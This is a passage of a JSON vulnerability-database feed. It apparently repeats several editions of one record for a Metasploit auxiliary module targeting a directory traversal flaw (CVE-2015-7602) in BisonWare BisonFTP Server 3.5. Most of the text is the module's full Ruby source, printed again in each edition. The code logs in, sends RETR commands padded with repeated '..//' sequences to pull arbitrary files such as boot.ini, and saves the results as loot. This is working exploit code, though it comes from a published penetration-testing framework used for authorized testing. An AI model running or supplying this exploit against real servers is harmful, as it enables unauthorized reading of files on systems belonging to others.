else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T15:50:02", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T20:46:11", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T20:46:11", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T22:50:09", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T22:50:09", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T19:29:27", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T19:29:27", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T21:31:43", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T21:31:43", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T15:32:48", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T15:32:48", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T17:34:15", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T17:34:15", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T19:33:32", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n 